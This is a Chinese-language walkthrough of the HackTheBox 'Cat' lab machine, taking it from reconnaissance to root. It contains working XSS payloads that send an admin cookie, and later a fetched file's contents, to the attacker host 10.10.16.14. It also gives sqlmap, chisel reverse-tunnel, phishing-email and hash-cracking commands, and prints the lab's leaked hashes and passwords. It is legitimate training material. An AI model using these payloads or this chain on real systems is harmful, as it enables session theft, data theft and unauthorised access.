HTB-Cat靶机渗透测试教学文档<\/h1>

靶机信息<\/h2>
靶机链接: https:\/\/app.hackthebox.com\/machines\/Cat<\/li>
靶机IP: 10.10.11.53<\/li>
操作系统: Ubuntu Linux (基于OpenSSH和Apache版本判断)<\/li> <\/ul>
初始侦察<\/h2>

端口扫描<\/h3>
使用fscan<\/code>进行快速端口扫描:<\/p>
.\/fscan -h 10.10.11.53 -nobr -nopoc
<\/span><\/span><\/code><\/pre>发现开放端口:<\/p>

22\/tcp (SSH)<\/li>
80\/tcp (HTTP)<\/li>
<\/ul>
详细Nmap扫描:<\/p>
nmap -sTVC -O -p22,80 10.10.11.53
<\/span><\/span><\/code><\/pre>确认服务版本:<\/p>

OpenSSH 8.2p1 Ubuntu 4ubuntu0.11<\/li>
Apache httpd 2.4.41<\/li>
<\/ul>
Web服务发现<\/h3>
访问http:\/\/10.10.11.53会重定向到http:\/\/cat.htb，需要将域名添加到\/etc\/hosts:<\/p>
echo "10.10.11.53 cat.htb"<\/span> | sudo tee -a \/etc\/hosts
<\/span><\/span><\/code><\/pre>Web渗透<\/h2>
目录爆破<\/h3>
使用dirb进行目录扫描:<\/p>
dirb http:\/\/cat.htb
<\/span><\/span><\/code><\/pre>发现.git<\/code>目录暴露，存在Git信息泄露漏洞。<\/p>
Git信息泄露利用<\/h3>
使用GitHack工具下载源代码:<\/p>
python3 GitHack.py http:\/\/cat.htb\/.git\/
<\/span><\/span><\/code><\/pre>目录结构:<\/p>
.
├── accept_cat.php
├── admin.php
├── config.php
├── contest.php
├── css
│   └── styles.css
├── delete_cat.php
├── img
│   ├── cat1.jpg
│   ├── cat2.png
│   └── cat3.webp
├── img_winners
│   ├── cat1.jpg
│   ├── cat2.png
│   └── cat3.webp
├── index.php
├── join.php
├── logout.php
├── view_cat.php
├── vote.php
├── winners
│   └── cat_report_20240831_173129.php
└── winners.php
<\/code><\/pre>
代码审计发现漏洞<\/h3>

XSS漏洞<\/strong>:

在view_cat.php<\/code>中，用户名输出未经过滤:<\/li>
<\/ol>
<<\/span>strong<\/span>><\/span>Owner<\/span>:<\/<\/span>strong<\/span>><\/span> <?<\/span>php<\/span> echo<\/span> $cat['username'<\/span>]; ?><\/span><br>
<\/span><\/span><\/span><\/code><\/pre>应该使用htmlspecialchars()<\/code>进行过滤。<\/p>

SQL注入漏洞<\/strong>:

在accept_cat.php<\/code>中，$cat_name<\/code>直接拼接SQL语句:<\/li>
<\/ol>
$sql_insert =<\/span> "INSERT INTO accepted_cats (name) VALUES ('<\/span>$cat_name<\/span>')"<\/span>;
<\/span><\/span>$pdo-><\/span>exec<\/span>($sql_insert);
<\/span><\/span><\/code><\/pre>攻击步骤<\/h3>

XSS获取管理员Cookie<\/strong>:

注册用户时，用户名使用XSS payload:<\/li>
<\/ol>
<<\/span>script<\/span>><\/span>document.location<\/span>=<\/span>'http:\/\/10.10.16.14:8888\/?c='<\/span>+<\/span>document.cookie<\/span>;<<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>启动HTTP服务器监听:<\/p>
python3 -m http.server 8888<\/span>
<\/span><\/span><\/code><\/pre>登录后提交猫的照片，等待管理员查看触发XSS。<\/p>

SQL注入利用<\/strong>:

使用sqlmap自动化注入:<\/li>
<\/ol>
sqlmap -u "http:\/\/cat.htb\/accept_cat.php"<\/span> --data "catId=1&catName=mal"<\/span> --cookie=<\/span>"PHPSESSID=cege257iom0cqihqnnp0ileg8l"<\/span> --batch --dbms SQLite -p catName --level 5<\/span> --risk 3<\/span> -D SQLite_masterdb -T users --dump --threads=<\/span>10<\/span>
<\/span><\/span><\/code><\/pre>获取到用户哈希:<\/p>
user_id | email                          | password                         | username
1       | axel2017@gmail.com             | d1bbba3670feb9435c9841e46e60ee2f | axel
2       | rosamendoza485@gmail.com        | ac369922d560f17d6eeb8b2c7dec498c | rosa
3       | robertcervantes2000@gmail.com   | 42846631708f69c00ec0c0a8aa4a92ad | robert
<\/code><\/pre>

哈希破解<\/strong>:

使用John the Ripper破解:<\/li>
<\/ol>
john --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hash --format=<\/span>Raw-MD5
<\/span><\/span><\/code><\/pre>得到rosa的密码: soyunaprincesarosa<\/code><\/p>
系统立足点<\/h2>
SSH登录<\/h3>
使用rosa凭据登录:<\/p>
ssh rosa@cat.htb
<\/span><\/span><\/code><\/pre>横向移动<\/h3>
在系统中查找其他用户凭据:<\/p>
grep -R axel \/var\/* 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现axel的密码。<\/p>
权限提升<\/h2>
发现内部服务<\/h3>
在邮件中发现:<\/p>

Gitea服务运行在localhost:3000<\/li>
员工管理系统项目信息<\/li>
<\/ol>
端口转发<\/h3>
使用chisel进行端口转发:

攻击机:<\/p>
.\/chisel server -p 12345<\/span> --reverse
<\/span><\/span><\/code><\/pre>目标机:<\/p>
.\/chisel client 10.10.16.14:12345 R:3000:127.0.0.1:3000
<\/span><\/span><\/code><\/pre>Gitea XSS漏洞利用<\/h3>
Gitea版本1.22.0存在存储型XSS漏洞(CVE-2024-6886)<\/p>

创建仓库并插入XSS payload:<\/li>
<\/ol>
<a<\/span> href<\/span>=<\/span>"javascript:fetch('http:\/\/localhost:3000\/administrator\/Employee-management\/raw\/branch\/main\/index.php')
<\/span><\/span><\/span>.then(response => response.text())
<\/span><\/span><\/span>.then(data => fetch('http:\/\/10.10.16.14\/?response=' + encodeURIComponent(data)))
<\/span><\/span><\/span>.catch(error => console.error('Error:', error));"<\/span>>XSS test<\/a<\/span>>
<\/span><\/span><\/code><\/pre>
发送邮件诱使jobert点击:<\/li>
<\/ol>
echo -e "Subject: test \n\nHello check my repo http:\/\/localhost:3000\/axel\/test"<\/span> | sendmail jobert@localhost
<\/span><\/span><\/code><\/pre>
监听获取敏感信息:<\/li>
<\/ol>
nc -lvnp 80<\/span>
<\/span><\/span><\/code><\/pre>获取到index.php内容，包含管理员凭据:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$valid_username =<\/span> 'admin'<\/span>;
<\/span><\/span>$valid_password =<\/span> 'IKw75eR0MR7CMIxhH0'<\/span>;
<\/span><\/span>
<\/span><\/span>if<\/span> (!<\/span>isset<\/span>($_SERVER['PHP_AUTH_USER'<\/span>]) ||<\/span> !<\/span>isset<\/span>($_SERVER['PHP_AUTH_PW'<\/span>]) ||<\/span> 
<\/span><\/span>    $_SERVER['PHP_AUTH_USER'<\/span>] !=<\/span> $valid_username ||<\/span> $_SERVER['PHP_AUTH_PW'<\/span>] !=<\/span> $valid_password) {
<\/span><\/span>    
<\/span><\/span>    header<\/span>('WWW-Authenticate: Basic realm="Employee Management"'<\/span>);
<\/span><\/span>    header<\/span>('HTTP\/1.0 401 Unauthorized'<\/span>);
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>header<\/span>('Location: dashboard.php'<\/span>);
<\/span><\/span>exit<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>获取root权限<\/h3>
使用获取的密码切换到root:<\/p>
su root
<\/span><\/span><\/code><\/pre>输入密码: IKw75eR0MR7CMIxhH0<\/code><\/p>
总结<\/h2>
本靶机渗透测试涉及以下关键技术点:<\/p>

Git信息泄露漏洞利用<\/li>
XSS漏洞利用获取管理员Cookie<\/li>
SQL注入漏洞利用获取数据库信息<\/li>
哈希破解获取用户凭据<\/li>
内部服务发现与端口转发<\/li>
Gitea存储型XSS漏洞利用(CVE-2024-6886)<\/li>
通过XSS读取敏感文件获取root凭据<\/li>
<\/ol>
整个渗透过程展示了从外部攻击到内部横向移动，最终获取系统最高权限的完整路径。<\/p>